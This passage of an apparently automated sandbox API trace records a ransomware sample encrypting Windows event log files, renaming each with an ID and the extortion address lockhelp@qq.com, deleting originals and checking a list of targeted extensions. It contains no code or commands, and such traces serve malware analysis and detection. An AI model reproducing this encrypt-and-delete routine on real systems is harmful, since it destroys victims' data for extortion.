lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.133] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0215.133] CloseHandle (hObject=0x3b8) returned 1 [0215.133] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 0x20 [0215.133] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.133] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0215.133] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.134] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.134] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0215.134] GetLastError () returned 0x0 [0215.134] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.136] WriteFile (in: hFile=0x450, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.137] ReadFile (in: hFile=0x3b8, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.138] WriteFile (in: hFile=0x450, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x160, lpOverlapped=0x0) returned 1 [0215.138] SetEndOfFile (hFile=0x450) returned 1 [0215.138] CloseHandle (hObject=0x450) returned 1 [0215.140] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.140] SetEndOfFile (hFile=0x3b8) returned 1 [0215.141] CloseHandle (hObject=0x3b8) returned 1 [0215.141] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.141] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 1 [0215.141] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.141] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.141] lstrlenW (lpString=".doc") returned 4 [0215.141] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.141] lstrlenW (lpString=".docx") returned 5 [0215.142] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.142] lstrlenW (lpString=".pdf") returned 4 [0215.142] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".xls") returned 4 [0215.142] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".xlsx") returned 5 [0215.142] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.142] lstrlenW (lpString=".ppt") returned 4 [0215.142] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.142] lstrlenW (lpString=".zip") returned 4 [0215.142] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".rar") returned 4 [0215.142] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".bz2") returned 4 [0215.142] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".7z") returned 3 [0215.142] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.142] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.142] lstrlenW (lpString=".dbf") returned 4 [0215.142] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.142] lstrlenW (lpString=".1cd") returned 4 [0215.142] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.142] lstrlenW (lpString=".jpg") returned 4 [0215.142] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.142] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.142] lstrlenW (lpString=".doc") returned 4 [0215.142] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".docx") returned 5 [0215.142] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.142] lstrlenW (lpString=".pdf") returned 4 [0215.142] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.142] lstrlenW (lpString=".xls") returned 4 [0215.142] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString=".xlsx") returned 5 [0215.143] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.143] lstrlenW (lpString=".ppt") returned 4 [0215.143] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.143] lstrlenW (lpString=".zip") returned 4 [0215.143] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString=".rar") returned 4 [0215.143] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString=".bz2") returned 4 [0215.143] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString=".7z") returned 3 [0215.143] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.143] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.143] lstrlenW (lpString=".dbf") returned 4 [0215.143] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.143] lstrlenW (lpString=".1cd") returned 4 [0215.143] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.143] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 78 [0215.143] lstrlenW (lpString=".jpg") returned 4 [0215.143] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.143] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.143] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 76 [0215.143] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.182] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0215.182] CloseHandle (hObject=0x3d4) returned 1 [0215.182] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 0x20 [0215.182] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.182] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.183] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.183] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.183] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0215.183] GetLastError () returned 0x0 [0215.183] ReadFile (in: hFile=0x3d4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.185] WriteFile (in: hFile=0x43c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.187] ReadFile (in: hFile=0x3d4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.187] WriteFile (in: hFile=0x43c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x16c, lpOverlapped=0x0) returned 1 [0215.187] SetEndOfFile (hFile=0x43c) returned 1 [0215.187] CloseHandle (hObject=0x43c) returned 1 [0215.189] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.189] SetEndOfFile (hFile=0x3d4) returned 1 [0215.190] CloseHandle (hObject=0x3d4) returned 1 [0215.190] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.190] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 1 [0215.190] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.190] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.190] lstrlenW (lpString=".doc") returned 4 [0215.190] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.190] lstrlenW (lpString=".docx") returned 5 [0215.190] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.190] lstrlenW (lpString=".pdf") returned 4 [0215.190] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.190] lstrlenW (lpString=".xls") returned 4 [0215.191] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString=".xlsx") returned 5 [0215.191] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.191] lstrlenW (lpString=".ppt") returned 4 [0215.191] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.191] lstrlenW (lpString=".zip") returned 4 [0215.191] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString=".rar") returned 4 [0215.191] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString=".bz2") returned 4 [0215.191] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString=".7z") returned 3 [0215.191] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.191] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.191] lstrlenW (lpString=".dbf") returned 4 [0215.191] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.191] lstrlenW (lpString=".1cd") returned 4 [0215.191] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.191] lstrlenW (lpString=".jpg") returned 4 [0215.191] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.191] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.191] lstrlenW (lpString=".doc") returned 4 [0215.191] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString=".docx") returned 5 [0215.191] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.191] lstrlenW (lpString=".pdf") returned 4 [0215.191] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.191] lstrlenW (lpString=".xls") returned 4 [0215.192] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString=".xlsx") returned 5 [0215.192] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.192] lstrlenW (lpString=".ppt") returned 4 [0215.192] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.192] lstrlenW (lpString=".zip") returned 4 [0215.192] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString=".rar") returned 4 [0215.192] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString=".bz2") returned 4 [0215.192] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString=".7z") returned 3 [0215.192] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.192] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.192] lstrlenW (lpString=".dbf") returned 4 [0215.192] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.192] lstrlenW (lpString=".1cd") returned 4 [0215.192] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.192] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0215.192] lstrlenW (lpString=".jpg") returned 4 [0215.192] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.193] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.193] lstrlenW (lpString="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 44 [0215.193] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.193] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0215.193] CloseHandle (hObject=0x3d4) returned 1 [0215.193] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 0x20 [0215.193] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.193] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.193] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.193] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.193] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0215.194] GetLastError () returned 0x0 [0215.194] ReadFile (in: hFile=0x3d4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.206] WriteFile (in: hFile=0x43c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.208] ReadFile (in: hFile=0x3d4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0215.208] WriteFile (in: hFile=0x43c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x12c, lpOverlapped=0x0) returned 1 [0215.208] SetEndOfFile (hFile=0x43c) returned 1 [0215.209] CloseHandle (hObject=0x43c) returned 1 [0215.211] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.211] SetEndOfFile (hFile=0x3d4) returned 1 [0215.212] CloseHandle (hObject=0x3d4) returned 1 [0215.212] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.213] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 1 [0215.213] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.213] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.213] lstrlenW (lpString=".doc") returned 4 [0215.213] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.213] lstrlenW (lpString=".docx") returned 5 [0215.213] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.213] lstrlenW (lpString=".pdf") returned 4 [0215.213] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.213] lstrlenW (lpString=".xls") returned 4 [0215.213] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString=".xlsx") returned 5 [0215.214] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.214] lstrlenW (lpString=".ppt") returned 4 [0215.214] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.214] lstrlenW (lpString=".zip") returned 4 [0215.214] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString=".rar") returned 4 [0215.214] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString=".bz2") returned 4 [0215.214] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString=".7z") returned 3 [0215.214] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.214] lstrlenW (lpString=".dbf") returned 4 [0215.214] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.214] lstrlenW (lpString=".1cd") returned 4 [0215.214] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.214] lstrlenW (lpString=".jpg") returned 4 [0215.214] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.214] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.214] lstrlenW (lpString=".doc") returned 4 [0215.214] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.214] lstrlenW (lpString=".docx") returned 5 [0215.214] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.215] lstrlenW (lpString=".pdf") returned 4 [0215.215] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString=".xls") returned 4 [0215.215] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString=".xlsx") returned 5 [0215.215] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.215] lstrlenW (lpString=".ppt") returned 4 [0215.215] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.215] lstrlenW (lpString=".zip") returned 4 [0215.215] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString=".rar") returned 4 [0215.215] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString=".bz2") returned 4 [0215.215] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString=".7z") returned 3 [0215.215] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.215] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.215] lstrlenW (lpString=".dbf") returned 4 [0215.215] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.215] lstrlenW (lpString=".1cd") returned 4 [0215.215] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.215] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 52 [0215.215] lstrlenW (lpString=".jpg") returned 4 [0215.215] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.216] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.216] lstrlenW (lpString="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 45 [0215.216] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0215.216] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0215.216] CloseHandle (hObject=0x3d4) returned 1 [0215.216] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx")) returned 0x20 [0215.216] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.216] 